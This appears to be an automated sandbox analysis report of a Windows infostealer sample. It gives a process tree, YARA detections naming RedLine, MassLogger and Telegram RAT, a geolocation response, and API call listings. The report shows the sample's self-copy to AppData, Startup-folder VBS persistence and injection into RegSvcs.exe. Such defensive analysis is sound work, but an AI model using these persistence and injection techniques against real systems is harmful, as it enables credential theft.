2025-01-10 22:16:10 UTC	770	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 22:16:10 GMT Content-Type: text/xml Content-Length: 362 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kY4cAQk5QIJ3%2F23Ynk14CXokFEuIvMfwzM4%2Fk0Nrj26Krk7oMVlrDPjPv0H7NnLQyNXbhoUfuY2K9ExEd16gAWzb91K3wZQ%2BCSUnZNA2NabFFvnSg%2F21FgtBCA%2BXqhwBsQLuqhIQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 900007ab4f030f36-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1472&min_rtt=1429&rtt_var=622&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=687&delivery_rate=1645070&cwnd=231&unsent_bytes=0&cid=b7041a31c5f2b313&ts=302&x=0"
2025-01-10 22:16:10 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Target ID:	0
Start time:	17:15:40
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\7b4Iaf58Rp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\7b4Iaf58Rp.exe"
Imagebase:	0xf90000
File size:	1'125'888 bytes
MD5 hash:	1522DA1337568F1F00AA81AF4A9E345D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	17:15:43
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\scrolar\neophobia.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\7b4Iaf58Rp.exe"
Imagebase:	0xd40000
File size:	1'125'888 bytes
MD5 hash:	1522DA1337568F1F00AA81AF4A9E345D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.1495389103.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 91%, ReversingLabs Detection: 68%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	17:15:47
Start date:	10/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\7b4Iaf58Rp.exe"
Imagebase:	0x260000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	17:15:48
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\scrolar\neophobia.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\scrolar\neophobia.exe"
Imagebase:	0xd40000
File size:	1'125'888 bytes
MD5 hash:	1522DA1337568F1F00AA81AF4A9E345D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000004.00000002.1531826494.0000000001490000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	17:15:51
Start date:	10/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\scrolar\neophobia.exe"
Imagebase:	0x160000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	17:15:51
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\scrolar\neophobia.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\scrolar\neophobia.exe"
Imagebase:	0xd40000
File size:	1'125'888 bytes
MD5 hash:	1522DA1337568F1F00AA81AF4A9E345D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000006.00000002.1571996988.0000000002320000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	17:15:55
Start date:	10/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\scrolar\neophobia.exe"
Imagebase:	0xc40000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2664984338.00000000032F4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000007.00000002.2667760848.0000000005710000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2667760848.0000000005710000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.2667760848.0000000005710000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000007.00000002.2667760848.0000000005710000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000007.00000002.2667760848.0000000005710000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000007.00000002.2667760848.0000000005710000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	17:15:58
Start date:	10/01/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs"
Imagebase:	0x7ff749a10000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	17:15:58
Start date:	10/01/2025
Path:	C:\Users\user\AppData\Local\scrolar\neophobia.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\scrolar\neophobia.exe"
Imagebase:	0xd40000
File size:	1'125'888 bytes
MD5 hash:	1522DA1337568F1F00AA81AF4A9E345D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000A.00000002.1648249221.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	17:16:03
Start date:	10/01/2025
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\scrolar\neophobia.exe"
Imagebase:	0x4b0000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000B.00000002.2666782183.00000000038F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2666782183.00000000038F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.2666782183.00000000038F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.2666782183.00000000038F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.2666782183.00000000038F1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000B.00000002.2663292675.0000000002550000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2663292675.0000000002550000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.2663292675.0000000002550000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.2663292675.0000000002550000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.2663292675.0000000002550000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2664477879.0000000002AB4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000B.00000002.2664119117.0000000002752000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.2664119117.0000000002752000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.2664119117.0000000002763000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.3%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	9%
Total number of Nodes:	2000
Total number of Limit Nodes:	50

Executed Functions

Function 00F93B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F93B68
IsDebuggerPresent.KERNEL32 ref: 00F93B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,010552F8,010552E0,?,?), ref: 00F93BEB

Part of subcall function 00F97BCC: _memmove.LIBCMT ref: 00F97C06

Part of subcall function 00FA092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00F93C14,010552F8,?,?,?), ref: 00FA096E

SetCurrentDirectoryW.KERNEL32(?), ref: 00F93C6F
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,01047770,00000010), ref: 00FCD281
SetCurrentDirectoryW.KERNEL32(?,010552F8,?,?,?), ref: 00FCD2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,01044260,010552F8,?,?,?), ref: 00FCD33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 00FCD346

Part of subcall function 00F93A46: GetSysColorBrush.USER32(0000000F), ref: 00F93A50
Part of subcall function 00F93A46: LoadCursorW.USER32(00000000,00007F00), ref: 00F93A5F
Part of subcall function 00F93A46: LoadIconW.USER32(00000063), ref: 00F93A76
Part of subcall function 00F93A46: LoadIconW.USER32(000000A4), ref: 00F93A88
Part of subcall function 00F93A46: LoadIconW.USER32(000000A2), ref: 00F93A9A
Part of subcall function 00F93A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F93AC0
Part of subcall function 00F93A46: RegisterClassExW.USER32(?), ref: 00F93B16

Part of subcall function 00F939D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F93A03
Part of subcall function 00F939D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F93A24
Part of subcall function 00F939D5: ShowWindow.USER32(00000000,?,?), ref: 00F93A38
Part of subcall function 00F939D5: ShowWindow.USER32(00000000,?,?), ref: 00F93A41

Part of subcall function 00F9434A: _memset.LIBCMT ref: 00F94370
Part of subcall function 00F9434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F94415

Strings

runas, xrefs: 00FCD33A
This is a third-party compiled AutoIt script., xrefs: 00FCD279

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 529118366-3287110873
Opcode ID: a0b27d7f183e07586f7f3e2b946d1ef3ae6019d3781f3dbd3ac3d5f2e498d063
Instruction ID: 2083c1b7871e689e38bc0fa021331ec401bd87f98b18a105d31c6e8160b2778f
Opcode Fuzzy Hash: a0b27d7f183e07586f7f3e2b946d1ef3ae6019d3781f3dbd3ac3d5f2e498d063
Instruction Fuzzy Hash: 8B511771D04309AEEF21EBB4DC06EFE7B78BF46750F004069F491A6142DA7D5645EB21

Function 00F949A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00F949CD

Part of subcall function 00F97BCC: _memmove.LIBCMT ref: 00F97C06

GetCurrentProcess.KERNEL32(?,0101FAEC,00000000,00000000,?), ref: 00F94A9A
IsWow64Process.KERNEL32(00000000), ref: 00F94AA1
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00F94AE7
FreeLibrary.KERNEL32(00000000), ref: 00F94AF2
GetSystemInfo.KERNEL32(00000000), ref: 00F94B23
GetSystemInfo.KERNEL32(00000000), ref: 00F94B2F

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 55197ef672014b86ed5715ec13e8b66e22be7c87212998f5c737202c295c6be8
Instruction ID: 82b876950e848b70d56e5a8ab794061a015851148fbf645e8cb77cb039169abf
Opcode Fuzzy Hash: 55197ef672014b86ed5715ec13e8b66e22be7c87212998f5c737202c295c6be8
Instruction Fuzzy Hash: A59105319897C1DEDB31DF688551AAABFF4AF3A310B0449ADD0C683A41D238B509E759

Function 00F94E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00F94D8E,?,?,00000000,00000000), ref: 00F94E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00F94D8E,?,?,00000000,00000000), ref: 00F94EB0
LoadResource.KERNEL32(?,00000000,?,?,00F94D8E,?,?,00000000,00000000,?,?,?,?,?,?,00F94E2F), ref: 00FCD937
SizeofResource.KERNEL32(?,00000000,?,?,00F94D8E,?,?,00000000,00000000,?,?,?,?,?,?,00F94E2F), ref: 00FCD94C
LockResource.KERNEL32(00F94D8E,?,?,00F94D8E,?,?,00000000,00000000,?,?,?,?,?,?,00F94E2F,00000000), ref: 00FCD95F

Strings

SCRIPT, xrefs: 00F94EA6

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: eb4be0197fd52e5f145cef9b120b12f3653e26d33d06cdd8fcb5d28d26a6c102
Instruction ID: 43e568b8206734a584d5d1dd361f1187731e5b2ac63acf68764f5979f7c501ec
Opcode Fuzzy Hash: eb4be0197fd52e5f145cef9b120b12f3653e26d33d06cdd8fcb5d28d26a6c102
Instruction Fuzzy Hash: 24119E75640701BFEB209B65EC48F677BBAFBC5B11F10426CF44586250DB7AEC059660

Function 00F9FCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: BuffCharUpper
String ID:
API String ID: 3964851224-0
Opcode ID: b0ac73d1048ceac8823afcebeed2c16a3d53deaba8e602bb78178caf51f82f66
Instruction ID: f8ec69fbbef4e85e872e48906b3154bbbaf387447a79f3cbcd37ebd26f526035
Opcode Fuzzy Hash: b0ac73d1048ceac8823afcebeed2c16a3d53deaba8e602bb78178caf51f82f66
Instruction Fuzzy Hash: F6928EB1A083418FD720DF14C480B6BB7E1BF86314F18896DE89A8B351DB75EC45EB92

Function 00FF445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00FCE398), ref: 00FF446A
FindFirstFileW.KERNELBASE(?,?), ref: 00FF447B
FindClose.KERNEL32(00000000), ref: 00FF448B

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 30e32ae44c8d0f351c01b31d1274d89e6eee5f8462341a1055cdbda46671e2c3
Instruction ID: a9a51fece654bf0f5cdd5984a1c41b7b2c729f8321dcd7cf15a76b0910ee6001
Opcode Fuzzy Hash: 30e32ae44c8d0f351c01b31d1274d89e6eee5f8462341a1055cdbda46671e2c3
Instruction Fuzzy Hash: 8AE0D833810905675220AA38EC0D4FA775C9E05335F104705FD75D10D0EB7C6904A695

Function 00F9E6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00FD3E62

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: f333377fd7408dd7bb855459c31f14dec5c1567ab0d3abae4fb9f29d64682e5f
Instruction ID: e02d28c83b0d44bdf62df2eed8c04f8d7cdc3a1b553627c7a97c4bb1da82c7f7
Opcode Fuzzy Hash: f333377fd7408dd7bb855459c31f14dec5c1567ab0d3abae4fb9f29d64682e5f
Instruction Fuzzy Hash: B3A27B75E00209CFEF24CF58C480AAAB7B2FF58314F68805AE945AB351D735ED46EB91

Function 00FA09D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FA0A5B
timeGetTime.WINMM ref: 00FA0D16
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FA0E53
Sleep.KERNEL32(0000000A), ref: 00FA0E61
LockWindowUpdate.USER32(00000000,?,?), ref: 00FA0EFA
DestroyWindow.USER32 ref: 00FA0F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FA0F20
Sleep.KERNEL32(0000000A,?,?), ref: 00FD4E83
TranslateMessage.USER32(?), ref: 00FD5C60
DispatchMessageW.USER32(?), ref: 00FD5C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FD5C82

Strings

@GUI_WINHANDLE, xrefs: 00FD4F8F
@TRAY_ID, xrefs: 00FD578F
@GUI_CTRLHANDLE, xrefs: 00FD4FE4
@GUI_CTRLID, xrefs: 00FD4F3A
@COM_EVENTOBJ, xrefs: 00FD54F0

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
API String ID: 4212290369-3242690629
Opcode ID: 8196feaebdfd9f4348e0f735ff230f725208cfce1bb1d8ea9ae5e27110afc14c
Instruction ID: 667891ad234d4f8ea30097788928e94d3f4b0bafe0f7df926016a67e32a23c45
Opcode Fuzzy Hash: 8196feaebdfd9f4348e0f735ff230f725208cfce1bb1d8ea9ae5e27110afc14c
Instruction Fuzzy Hash: 0BB20470A08741DFDB24DF24C884BAAB7E2BF85714F18491EF48997391CB79E844EB42

Function 00FF9155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00FF8F5F: __time64.LIBCMT ref: 00FF8F69

Part of subcall function 00F94EE5: _fseek.LIBCMT ref: 00F94EFD

__wsplitpath.LIBCMT ref: 00FF9234

Part of subcall function 00FB40FB: __wsplitpath_helper.LIBCMT ref: 00FB413B

_wcscpy.LIBCMT ref: 00FF9247
_wcscat.LIBCMT ref: 00FF925A
__wsplitpath.LIBCMT ref: 00FF927F
_wcscat.LIBCMT ref: 00FF9295
_wcscat.LIBCMT ref: 00FF92A8

Part of subcall function 00FF8FA5: _memmove.LIBCMT ref: 00FF8FDE
Part of subcall function 00FF8FA5: _memmove.LIBCMT ref: 00FF8FED

_wcscmp.LIBCMT ref: 00FF91EF

Part of subcall function 00FF9734: _wcscmp.LIBCMT ref: 00FF9824
Part of subcall function 00FF9734: _wcscmp.LIBCMT ref: 00FF9837

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00FF9452
_wcsncpy.LIBCMT ref: 00FF94C5
DeleteFileW.KERNEL32(?,?), ref: 00FF94FB
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00FF9511
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00FF9522
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00FF9534

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
